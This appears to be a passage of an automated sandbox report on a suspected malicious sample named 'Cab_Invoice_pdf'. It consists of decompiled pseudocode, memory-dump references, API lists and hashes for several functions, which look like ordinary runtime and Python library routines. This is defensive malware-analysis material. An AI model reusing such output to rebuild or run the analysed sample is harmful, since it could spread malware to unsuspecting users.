							_t15 = E01326D40(_t62, 0);
							_t16 = _a8;
							if(_t15 == 0) {
								goto L13;
							} else {
								 *_t16 = ".";
							}
						} else {
							_t16 = _a8;
							L13:
							 *_t16 = _t62;
						}
						_t61 = 0;
						L17:
						E013209EB(_t68);
						return _t61;
					}
				}
			}
























                            0x0131f193
                            0x0131f198
                            0x0131f1a8
                            0x0131f1ab
                            0x0131f1b5
                            0x0131f1c4
                            0x0131f1c7
                            0x0131f1cb
                            0x00000000
                            0x0131f1cd
                            0x0131f1cf
                            0x0131f1d8
                            0x0131f1e3
                            0x0131f1e4
                            0x0131f1e9
                            0x0131f1ee
                            0x0131f20c
                            0x00000000
                            0x0131f1fd
                            0x0131f201
                            0x0131f203
                            0x0131f208
                            0x0131f1da
                            0x0131f1dd
                            0x0131f1df
                            0x0131f1df
                            0x0131f1d8
                            0x00000000
                            0x0131f1b7
                            0x0131f1ba
                            0x0131f25a
                            0x0131f25b
                            0x0131f25c
                            0x0131f25d
                            0x0131f25e
                            0x0131f25f
                            0x0131f264
                            0x0131f26a
                            0x0131f26b
                            0x0131f26c
                            0x0131f26d
                            0x0131f272
                            0x0131f273
                            0x0131f275
                            0x0131f277
                            0x0131f279
                            0x0131f27f
                            0x0131f2e6
                            0x0131f2e6
                            0x0131f281
                            0x0131f281
                            0x0131f288
                            0x0131f28c
                            0x0131f28e
                            0x0131f28e
                            0x0131f28f
                            0x0131f292
                            0x0131f293
                            0x0131f296
                            0x0131f29d
                            0x00000000
                            0x0131f29f
                            0x0131f2aa
                            0x0131f2b0
                            0x0131f2b6
                            0x0131f2bb
                            0x0131f2bd
                            0x0131f2c0
                            0x0131f2c0
                            0x0131f2c6
                            0x0131f2c8
                            0x0131f2cb
                            0x0131f2cb
                            0x0131f2ce
                            0x0131f2d1
                            0x0131f2c0
                            0x0131f2d8
                            0x0131f2b2
                            0x0131f2b2
                            0x0131f2b2
                            0x0131f2dc
                            0x0131f2e2
                            0x0131f2e2
                            0x0131f29d
                            0x0131f2ee
                            0x0131f1c0
                            0x0131f1c0
                            0x0131f212
                            0x0131f212
                            0x0131f217
                            0x0131f22e
                            0x0131f234
                            0x0131f23c
                            0x0131f240
                            0x00000000
                            0x0131f242
                            0x0131f242
                            0x0131f242
                            0x0131f226
                            0x0131f226
                            0x0131f229
                            0x0131f229
                            0x0131f229
                            0x0131f248
                            0x0131f24a
                            0x0131f24b
                            0x0131f259
                            0x0131f259
                            0x0131f1ba

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: TMP
                            • API String ID: 269201875-3125297090
                            • Opcode ID: eceb5b14c9a7f029e88d966b90cfc045e5d596b4cdbcd5e764fe61fe574d0d26
                            • Instruction ID: f3731e3e79587a18801af4c8c17b64d64b0237083e621961140dc6421baf6656
                            • Opcode Fuzzy Hash: eceb5b14c9a7f029e88d966b90cfc045e5d596b4cdbcd5e764fe61fe574d0d26
                            • Instruction Fuzzy Hash: 9321F6BE50461A6FE7197E5EAC818BF67ACEE8657C325001AFD049B244DA30DC0A4264
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F25B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • _PyUnicode_ToNumeric.PYTHON38 ref: 6E2F25ED
                            • PyErr_SetString.PYTHON38(6E79ED94,not a numeric character), ref: 6E2F261A
                            • PyFloat_FromDouble.PYTHON38 ref: 6E2F2637
                            Strings
                            • not a numeric character, xrefs: 6E2F2613
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DoubleErr_Float_FromNumericStringUnicode_
                            • String ID: not a numeric character
                            • API String ID: 727557307-2058156748
                            • Opcode ID: 2c50c3edb7d26abab23c1b3b2da7088b8bd964c1b9ccb286eac2ff2181106a69
                            • Instruction ID: 3c44254b5380eb4f99efb18979b2c5d910d81c01331e882abdbd203f869923f3
                            • Opcode Fuzzy Hash: 2c50c3edb7d26abab23c1b3b2da7088b8bd964c1b9ccb286eac2ff2181106a69
                            • Instruction Fuzzy Hash: E9016FB25A444ADBCB046F58EC49B55B7A9EF03217F0441E5EC4987211F722C527CBD6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013127A0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                            Download Yara Rule
                            C-Code - Quality: 40%
                            			E013127A0(void* __edx, signed int _a8192, char* _a8200) {
				short _v0;
				signed int _t9;
				long _t12;
				signed int _t14;
				void* _t26;
				char* _t28;
				signed int _t32;
				signed int _t33;

				_t26 = __edx;
				E01317880();
				_t9 =  *0x133c008; // 0xa212446c
				_a8192 = _t9 ^ _t32;
				_t28 = _a8200;
				_t12 = GetModuleFileNameW(0,  &_v0, 0x1000);
				_t39 = _t12;
				if(_t12 != 0) {
					_t14 = E01314C90(_t28,  &_v0, 0x1000);
					_t33 = _t32 + 0xc;
					__eflags = _t14;
					if(__eflags != 0) {
						__eflags = _a8192 ^ _t33;
						E0131786A();
						return 1;
					} else {
						_push("Failed to convert executable path to UTF-8.");
						E01311910(__eflags);
						__eflags = _a8192 ^ _t33 + 0x00000004;
						E0131786A();
						return 0;
					}
				} else {
					_push("Failed to get executable path.");
					_push("GetModuleFileNameW");
					E01311860(_t26, _t39);
					E0131786A();
					return 0;
				}
			}











                            0x013127a0
                            0x013127a5
                            0x013127aa
                            0x013127b1
                            0x013127b9
                            0x013127cc
                            0x013127d2
                            0x013127d4
                            0x0131280b
                            0x01312810
                            0x01312813
                            0x01312815
                            0x01312849
                            0x0131284b
                            0x01312856
                            0x01312817
                            0x01312817
                            0x0131281c
                            0x0131282e
                            0x01312830
                            0x0131283b
                            0x0131283b
                            0x013127d6
                            0x013127d6
                            0x013127db
                            0x013127e0
                            0x013127f4
                            0x013127ff
                            0x013127ff

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,013124BA,?,?), ref: 013127CC
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            Strings
                            • Failed to get executable path., xrefs: 013127D6
                            • Failed to convert executable path to UTF-8., xrefs: 01312817
                            • GetModuleFileNameW, xrefs: 013127DB
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastModuleName
                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                            • API String ID: 2776309574-482168174
                            • Opcode ID: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction ID: a205a57fdbf7f40491a2f4eb9c8ac3401cfe10d7a7d75353fa6430564aee038c
                            • Opcode Fuzzy Hash: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction Fuzzy Hash: 4901D8717103056BF63CA739DC8BBEB76D9AF94708F840429FE09C228AF6649504C69B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F4FCE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E6E2F4FCE(void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr* _t6;
				intOrPtr* _t8;
				intOrPtr* _t11;

				_t8 = _a4;
				_t11 =  *_t8;
				if( *_t11 != 0xe06d7363 ||  *((intOrPtr*)(_t11 + 0x10)) != 3) {
					L6:
					return 0;
				} else {
					_t6 =  *((intOrPtr*)(_t11 + 0x14));
					if(_t6 == 0x19930520 || _t6 == 0x19930521 || _t6 == 0x19930522 || _t6 == 0x1994000) {
						L6E2F547E();
						 *_t6 = _t11;
						L6E2F5484();
						 *_t6 =  *((intOrPtr*)(_t8 + 4));
						L6E2F54E4();
						asm("int3");
						M6E3F8DAC = M6E3F8DAC & 0x00000000;
						return _t6;
					} else {
						goto L6;
					}
				}
			}






                            0x6e2f4fd3
                            0x6e2f4fd6
                            0x6e2f4fde
                            0x6e2f5005
                            0x6e2f500a
                            0x6e2f4fe6
                            0x6e2f4fe6
                            0x6e2f4fee
                            0x6e2f500d
                            0x6e2f5012
                            0x6e2f5017
                            0x6e2f501c
                            0x6e2f501e
                            0x6e2f5023
                            0x6e2f5024
                            0x6e2f502b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f4fee

                            APIs
                            • __current_exception.VCRUNTIME140 ref: 6E2F500D
                            • __current_exception_context.VCRUNTIME140 ref: 6E2F5017
                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6E2F501E
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __current_exception__current_exception_contextterminate
                            • String ID: csm
                            • API String ID: 2542180945-1018135373
                            • Opcode ID: 5880b9dceeb19ffd75830669600669e63bb224754208947e0ad5e1cc624d21a0
                            • Instruction ID: 36f9eab3ca9cbaea67358444e53a45d40fc6f04b76923932c054c74a606071f2
                            • Opcode Fuzzy Hash: 5880b9dceeb19ffd75830669600669e63bb224754208947e0ad5e1cc624d21a0
                            • Instruction Fuzzy Hash: A5F082360C020FCBCB204EE5904054AF76EAE14B27751881AD4598BA10DBA0AD53CAE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324658, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E01324658(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E0131AFAE(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E01318520(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0132F230( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0132F150();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0132F150();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0132F150();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0132495B(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E013187B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0131C9CE();
					_t183 = 0x22;
					 *_t129 = _t183;
					E01321788();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                            0x01324658
                            0x01324663
                            0x0132466a
                            0x0132466c
                            0x0132466c
                            0x0132466e
                            0x01324677
                            0x01324679
                            0x0132467e
                            0x01324684
                            0x0132469a
                            0x0132469f
                            0x013246a2
                            0x013246af
                            0x013246b4
                            0x01324708
                            0x01324710
                            0x01324712
                            0x01324714
                            0x01324717
                            0x01324717
                            0x01324717
                            0x0132471d
                            0x01324725
                            0x01324738
                            0x0132473b
                            0x0132473d
                            0x01324740
                            0x01324741
                            0x01324762
                            0x01324765
                            0x01324765
                            0x01324743
                            0x01324743
                            0x01324745
                            0x01324750
                            0x01324750
                            0x01324752
                            0x01324759
                            0x01324754
                            0x01324754
                            0x01324754
                            0x01324752
                            0x01324766
                            0x01324768
                            0x01324769
                            0x0132476c
                            0x0132476e
                            0x01324778
                            0x01324782
                            0x01324770
                            0x01324770
                            0x01324770
                            0x01324787
                            0x01324787
                            0x0132478c
                            0x0132478f
                            0x0132479a
                            0x0132479a
                            0x0132479a
                            0x0132479a
                            0x0132479e
                            0x013247a5
                            0x013247a6
                            0x013247a9
                            0x013247ac
                            0x013247ac
                            0x013247ae
                            0x00000000
                            0x00000000
                            0x013247c6
                            0x013247cd
                            0x013247d1
                            0x013247d4
                            0x013247d7
                            0x013247d9
                            0x013247d9
                            0x013247d9
                            0x013247db
                            0x013247de
                            0x013247e1
                            0x013247e3
                            0x013247eb
                            0x013247f1
                            0x013247f4
                            0x013247f7
                            0x013247f8
                            0x013247fb
                            0x013247fe
                            0x013247fe
                            0x01324803
                            0x01324806
                            0x00000000
                            0x00000000
                            0x0132481e
                            0x01324823
                            0x01324827
                            0x00000000
                            0x00000000
                            0x0132482b
                            0x0132482e
                            0x0132482f
                            0x0132482f
                            0x01324831
                            0x01324834
                            0x00000000
                            0x00000000
                            0x01324836
                            0x01324839
                            0x01324840
                            0x01324843
                            0x01324846
                            0x0132485c
                            0x0132485c
                            0x0132485c
                            0x01324848
                            0x01324848
                            0x0132484a
                            0x0132484d
                            0x01324858
                            0x0132484f
                            0x01324852
                            0x01324852
                            0x0132484d
                            0x00000000
                            0x01324846
                            0x0132483b
                            0x0132483b
                            0x0132483d
                            0x0132483d
                            0x01324791
                            0x01324791
                            0x01324794
                            0x0132485f
                            0x0132485f
                            0x01324861
                            0x01324863
                            0x01324866
                            0x01324867
                            0x01324868
                            0x01324869
                            0x01324871
                            0x01324871
                            0x01324871
                            0x01324873
                            0x01324876
                            0x01324879
                            0x0132487b
                            0x0132487b
                            0x0132487d
                            0x0132488f
                            0x01324893
                            0x01324896
                            0x0132489d
                            0x013248a5
                            0x013248a5
                            0x013248a8
                            0x013248aa
                            0x013248bb
                            0x013248bb
                            0x013248bf
                            0x013248bf
                            0x013248c2
                            0x013248c4
                            0x013248c7
                            0x00000000
                            0x013248ac
                            0x013248ac
                            0x013248b2
                            0x013248b2
                            0x013248b6
                            0x013248c9
                            0x013248c9
                            0x013248cd
                            0x013248ce
                            0x013248d0
                            0x013248d2
                            0x01324913
                            0x01324913
                            0x01324915
                            0x01324922
                            0x01324922
                            0x01324924
                            0x01324926
                            0x01324927
                            0x01324928
                            0x0132492f
                            0x01324932
                            0x01324934
                            0x01324934
                            0x01324935
                            0x01324937
                            0x0132493a
                            0x0132493a
                            0x0132493c
                            0x0132493e
                            0x00000000
                            0x0132493e
                            0x01324917
                            0x01324919
                            0x00000000
                            0x00000000
                            0x0132491b
                            0x00000000
                            0x00000000
                            0x0132491d
                            0x01324920
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01324920
                            0x013248d9
                            0x013248df
                            0x013248df
                            0x013248e1
                            0x013248e2
                            0x013248e3
                            0x013248e4
                            0x013248eb
                            0x013248ee
                            0x013248f0
                            0x013248f1
                            0x013248f3
                            0x01324900
                            0x01324900
                            0x01324902
                            0x01324904
                            0x01324905
                            0x01324906
                            0x0132490d
                            0x01324910
                            0x01324912
                            0x01324912
                            0x00000000
                            0x01324912
                            0x013248f5
                            0x013248f5
                            0x013248f7
                            0x00000000
                            0x00000000
                            0x013248f9
                            0x00000000
                            0x00000000
                            0x013248fb
                            0x013248fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013248fe
                            0x013248db
                            0x013248dd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013248dd
                            0x013248ae
                            0x013248b0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013248b0
                            0x013248aa
                            0x00000000
                            0x01324794
                            0x0132478f
                            0x013246b6
                            0x013246b8
                            0x00000000
                            0x013246ba
                            0x013246d0
                            0x013246d5
                            0x013246d7
                            0x013246e3
                            0x013246e9
                            0x013246ea
                            0x013246ec
                            0x013246ee
                            0x013246f9
                            0x013246f9
                            0x013246fc
                            0x013246fe
                            0x013246fe
                            0x01324701
                            0x013246d9
                            0x013246d9
                            0x013246d9
                            0x00000000
                            0x013246d7
                            0x01324686
                            0x01324686
                            0x0132468d
                            0x0132468e
                            0x01324690
                            0x01324942
                            0x01324946
                            0x0132494b
                            0x0132494b
                            0x0132495a
                            0x0132495a

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction ID: 37408c50be862385cf85ac23bfa52516f9be958e5176de40648c675eb74b8eca
                            • Opcode Fuzzy Hash: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction Fuzzy Hash: A3A19A72E103A69FE722EF2CC8907AEBFE5EF52318F18416DD6A59B381C2758941C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F3E00, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 224stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E6E2F3E00(intOrPtr _a4, char* _a8, intOrPtr _a12, signed int* _a16, intOrPtr _a20) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				int _t55;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t67;
				void* _t68;
				signed int _t75;
				unsigned int _t79;
				intOrPtr _t101;
				signed int _t102;
				signed int _t103;
				signed int _t109;
				signed int _t110;
				void* _t111;
				signed int _t115;
				void* _t119;
				char _t123;
				signed int _t127;
				char* _t128;
				char* _t129;
				unsigned int _t131;
				signed int _t132;
				void* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;

				_t128 = _a8;
				_t54 = strncmp(_t128, "HANGUL SYLLABLE ", 0x10);
				_t141 = _t140 + 0xc;
				if(_t54 != 0) {
					_t55 = strncmp(_t128, "CJK UNIFIED IDEOGRAPH-", 0x16);
					_t142 = _t141 + 0xc;
					if(_t55 != 0) {
						_t101 = _a12;
						_t131 = 0;
						_t119 = 0;
						if(_t101 > 0) {
							do {
								_t131 = _t131 * 0x2f + ( *(( *(_t119 + _t128) & 0x000000ff) + __imp___Py_ctype_toupper) & 0x000000ff);
								_t79 = _t131 & 0xff000000;
								if(_t79 != 0) {
									_t131 = (_t131 ^ _t79 >> 0x00000018) & 0x00ffffff;
								}
								_t119 = _t119 + 1;
							} while (_t119 < _t101);
						}
						_t58 =  !_t131 & 0x0000ffff;
						_v16 = _t58;
						_t59 =  *((intOrPtr*)(0x6e3552e0 + _t58 * 4));
						_v20 = _t59;
						if(_t59 == 0) {
							goto L33;
						} else {
							_t61 = E6E2F3C90(_t101, _a4, _t59, _t128, _t131, _t128, _t101);
							_t143 = _t142 + 8;
							if(_t61 == 0) {
								_t132 = (_t131 >> 0x00000003 ^ _t131) & 0x0000ffff;
								if(_t132 == 0) {
									_t132 = 0xffff;
